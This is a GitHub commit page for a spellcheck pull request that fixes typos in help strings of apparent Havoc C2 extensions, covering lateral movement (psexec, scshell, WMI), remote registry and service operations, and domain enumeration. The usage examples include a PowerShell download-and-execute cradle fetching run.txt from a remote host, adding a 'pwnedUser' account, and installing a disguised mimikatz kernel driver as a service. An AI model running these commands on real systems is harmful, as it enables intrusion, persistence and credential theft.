Skip to content

Commit

Permalink
Merge pull request #26 from jabra-/spellcheck
Browse files Browse the repository at this point in the history
spellcheck
  • Loading branch information
S4ntiagoP authored Jan 6, 2024
2 parents a76ef0d + 68768c8 commit 87bf85d
Show file tree
Hide file tree
Showing 6 changed files with 15 additions and 15 deletions.
2 changes: 1 addition & 1 deletion InvokeAssembly/invokeassembly.py
Original file line number Diff line number Diff line change
Expand Up @@ -37,4 +37,4 @@ def InvokeAssembly( demonID, *param ):

return TaskID

RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a seperate process", 0, "[/path/to/assembl.exe] (args)", "/tmp/Seatbelt.exe -group=user" )
RegisterCommand( InvokeAssembly, "dotnet", "execute", "executes a dotnet assembly in a separate process", 0, "[/path/to/assembly.exe] (args)", "/tmp/Seatbelt.exe -group=user" )
2 changes: 1 addition & 1 deletion Jump-exec/Psexec/psexec.c
Original file line number Diff line number Diff line change
Expand Up @@ -166,5 +166,5 @@ VOID go( PVOID Buffer, ULONG Length )
if ( Success )
BeaconPrintf( HAVOC_CONSOLE_GOOD, "psexec successful executed on %s", Host );
else
BeaconPrintf( HAVOC_CONSOLE_ERRO, "psexec failed to execut on %s", Host );
BeaconPrintf( HAVOC_CONSOLE_ERRO, "psexec failed to execute on %s", Host );
}
2 changes: 1 addition & 1 deletion Jump-exec/ScShell/scshell.c
Original file line number Diff line number Diff line change
Expand Up @@ -214,5 +214,5 @@ VOID go( PVOID Buffer, ULONG Length )
if ( Success )
BeaconPrintf( CALLBACK_OUTPUT, "scshell successful executed on %s", Host );
else
BeaconPrintf( CALLBACK_ERROR, "scshell failed to execut on %s", Host );
BeaconPrintf( CALLBACK_ERROR, "scshell failed to execute on %s", Host );
}
4 changes: 2 additions & 2 deletions Jump-exec/WMI/wmi.py
Original file line number Diff line number Diff line change
Expand Up @@ -113,5 +113,5 @@ def wmi_proccreate( demonID, *params ):
return TaskID

RegisterModule( "jump-exec", "lateral movement module", "", "[exploit] (args)", "", "" )
RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path <otp:username> <otp:password> <otp:domain>", "10.10.10.10 /tmp/demon.vba" )
RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command <otp:username> <otp:password> <otp:domain>", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" )
RegisterCommand( wmi_eventsub, "jump-exec", "wmi-eventsub", "Run a VBscript via WMI for lateral movement", 0, "target local_script_path <opt:username> <opt:password> <opt:domain>", "10.10.10.10 /tmp/demon.vba" )
RegisterCommand( wmi_proccreate, "jump-exec", "wmi-proccreate", "Create a process via WMI for lateral movement", 0, "target command <opt:username> <opt:password> <opt:domain>", "10.10.10.10 \"powershell.exe (new-object system.net.webclient).downloadstring('http://192.168.49.100:8888/run.txt') | IEX\"" )
14 changes: 7 additions & 7 deletions RemoteOps/RemoteOps.py
Original file line number Diff line number Diff line change
Expand Up @@ -619,7 +619,7 @@ def adduser( demonID, *params ):

return TaskID

RegisterCommand( adcs_request, "", "adcs_request", "Request an enrollment certificate", 0, "/CA:ca [/TEMPLATE:template] [/SUBJECT:subject] [/ALTNAME:altname] [/INSTALL] [/MACHINE]", "1337 c:\\windwos\\temp\\test.txt" )
RegisterCommand( adcs_request, "", "adcs_request", "Request an enrollment certificate", 0, "/CA:ca [/TEMPLATE:template] [/SUBJECT:subject] [/ALTNAME:altname] [/INSTALL] [/MACHINE]", "1337 c:\\windows\\temp\\test.txt" )
RegisterCommand( addusertogroup, "", "addusertogroup", "Add the specified user to the specified group", 0, """<USERNAME> <GROUPNAME> <Server> <DOMAIN>
USERNAME Required. The user name to activate/enable.
GROUPNAME Required. The group to add the user to.
Expand All @@ -640,7 +640,7 @@ def adduser( demonID, *params ):
the domain name for the user if it is a domain account, or
use \"\" to target an account on the local machine.""", "pwnedUser Password123! computer132 \"\"" )
RegisterCommand( reg_delete, "", "reg_delete", "Deletes the registry key or value", 0, """<OPT:HOSTNAME> <HIVE> <REGPATH> <OPT:REGVALUE>
HOSTNAME Optional. The host to connect to and run the commnad on.
HOSTNAME Optional. The host to connect to and run the command on.
HIVE Required. The registry hive containing the REGPATH. Possible
values:
HKLM
Expand All @@ -662,7 +662,7 @@ def adduser( demonID, *params ):
FILEOUT Required. The output file.
Note: The FILEOUT is saved to disk on target, so don't forget to clean up.""", "HKLM Some\\Path c:\\windows\\temp\\reg.txt" )
RegisterCommand( reg_set, "", "reg_set", "This command creates or sets the specified registry key (or value) on the target host.", 0, """<OPT:HOSTNAME> <HIVE> <REGPATH> <KEY> <TYPE> <DATA>
HOSTNAME Optional. The host to connect to and run the commnad on.
HOSTNAME Optional. The host to connect to and run the command on.
HIVE Required. The registry hive containing the REGPATH. Possible
values:
HKLM
Expand Down Expand Up @@ -707,24 +707,24 @@ def adduser( demonID, *params ):
2 - SERVICE_KERNEL_DRIVER (Driver service)
3 - SERVICE_WIN32_OWN_PROCESS (Service that runs in its own process) <-- Default
4 - SERVICE_WIN32_SHARE_PROCESS (Service that shares a process with one or more other services)
HOSTNAME Optional. The host to connect to and run the commnad on. The
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv mimidrv C:\\Windows\\Temp\\mimidrv.sys \"\" 0 3 2" )
RegisterCommand( sc_start, "", "sc_start", "This command starts the specified service on the target host.", 0, """<SVCNAME> <OPT:HOSTNAME>
SVCNAME Required. The name of the service to start.
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv" )
RegisterCommand( sc_stop, "", "sc_stop", "This command stops the specified service on the target host.", 0, """<SVCNAME> <OPT:HOSTNAME>
SVCNAME Required. The name of the service to stop.
HOSTNAME Optional. The host to connect to and run the commnad on. The
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv" )
RegisterCommand( sc_delete, "", "sc_delete", "This command deletes the specified service on the target host.", 0, """<SVCNAME> <OPT:HOSTNAME>
SVCNAME Required. The name of the service to delete.
HOSTNAME Optional. The host to connect to and run the commnad on. The
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv" )
RegisterCommand( sc_description, "", "sc_description", "This command sets the description of an existing service on the target host.", 0, """<SVCNAME> <DESCRIPTION> <OPT:HOSTNAME>
SVCNAME Required. The name of the service to create.
DESCRIPTION Required. The description of the service.
HOSTNAME Optional. The host to connect to and run the commnad on. The
HOSTNAME Optional. The host to connect to and run the command on. The
local system is targeted if a HOSTNAME is not specified.""", "mimidrv \"definitely not a mimikatz kernel driver\"" )
RegisterCommand( adduser, "", "adduser", "Add a new user to a machine.", 0, """<USERNAME> <PASSWORD> <SERVER>
USERNAME Required. The name of the new user.
Expand Down
6 changes: 3 additions & 3 deletions SituationalAwareness/SituationalAwareness.py
Original file line number Diff line number Diff line change
Expand Up @@ -1468,15 +1468,15 @@ def sa_tasklist( demonID, *params ):
RegisterCommand( schtasksenum, "", "schtasksenum", "Enumerate scheduled tasks on the local or remote computer", 0, "[opt: server]", "" )
RegisterCommand( schtasksquery, "", "schtasksquery", "Query the given task on the local or remote computer", 0, "[opt: server] [taskpath]", "" )
RegisterCommand( sc_enum, "", "sc_enum", "Enumerate services for qc, query, qfailure, and qtriggers info", 0, "[opt: server]", "" )
RegisterCommand( sc_qc, "", "sc_qc", "sc qc impelmentation in BOF", 0, "service_name [opt:server]", "SensorService" )
RegisterCommand( sc_qc, "", "sc_qc", "sc qc implementation in BOF", 0, "service_name [opt:server]", "SensorService" )
RegisterCommand( sc_query, "", "sc_query", "sc query implementation in BOF", 0, "[opt: service name] [opt: server]", "" )
RegisterCommand( sc_qdescription, "", "sc_qdescription", "Queries a services description", 0, "service_name [opt: server]", "SensorService" )
RegisterCommand( sc_qfailure, "", "sc_qfailure", "Query a service for failure conditions", 0, "service_name [opt: server]", "SensorService" )
RegisterCommand( sc_qtriggerinfo, "", "sc_qtriggerinfo", "Query a service for trigger conditions", 0, "service_name [opt: server]", "SensorService" )
RegisterCommand( adcs_enum, "", "adcs_enum", "Enumerate CAs and templates in the AD using Win32 functions", 0, "[opt: domain]", "" )
RegisterCommand( enumlocalsessions, "", "enumlocalsessions", "Enumerate currently attached user sessions both local and over RDP", 0, "", "" )
RegisterCommand( enum_filter_driver, "", "enum_filter_driver", "Enumerate filter drivers", 0, "[opt: system]", "" )
RegisterCommand( ldapsearch, "", "ldapsearch", "Execute LDAP searches (NOTE: specify *,ntsecuritydescriptor as attribute parameter if you want all attributes + base64 encoded ACL of the objects, this can then be resolved using BOFHound. Could possibly break pagination, although everything seemed fine during testing.)", 0, "query [opt: attribute] [opt: results_limit] [opt: DC hostname or IP] [opt: Distingished Name]", "\"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))\"" )
RegisterCommand( ldapsearch, "", "ldapsearch", "Execute LDAP searches (NOTE: specify *,ntsecuritydescriptor as attribute parameter if you want all attributes + base64 encoded ACL of the objects, this can then be resolved using BOFHound. Could possibly break pagination, although everything seemed fine during testing.)", 0, "query [opt: attribute] [opt: results_limit] [opt: DC hostname or IP] [opt: Distinguished Name]", "\"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))\"" )
RegisterCommand( netsession, "", "get-netsession", "Enumerate sessions on the local or specified computer", 0, "[opt:computer]", "" )
RegisterCommand( netGroupList, "", "netGroupList", "List groups from the default or specified domain", 0, "[opt: domain]", "" )
RegisterCommand( netGroupListMembers, "", "netGroupListMembers", "List group members from the default or specified domain", 0, "groupname [opt: domain]", "" )
Expand All @@ -1490,6 +1490,6 @@ def sa_tasklist( demonID, *params ):
RegisterCommand( netsharesAdmin, "", "netsharesAdmin", "List shares on local or remote computer and gets more info then standard netshares (requires admin)", 0, "[opt: \\\\computername]", "" )
RegisterCommand( netuptime, "", "netuptime", "Returns information about the boot time on the local (or a remote) machine", 0, "[opt: hostname]", "" )
RegisterCommand( netview, "", "netview", "lists local workstations and servers", 0, "[opt: netbios_domain_name]", "" )
RegisterCommand( quser, "", "quser", "Simple implementation of quser.exe usingt the Windows API", 0, "<OPT:TARGET>", "10.10.10.10" )
RegisterCommand( quser, "", "quser", "Simple implementation of quser.exe using the Windows API", 0, "<OPT:TARGET>", "10.10.10.10" )
#RegisterCommand( bofdir, "", "bofdir", "Lists a target directory using BOF.", 0, "[directory] [/s]", "C:\\Windows\\Temp" )
RegisterCommand( sa_tasklist, "", "tasklist", "This command displays a list of currently running processes on either a local or remote machine.", 0, "[hostname]", "" )

0 comments on commit 87bf85d

Please sign in to comment.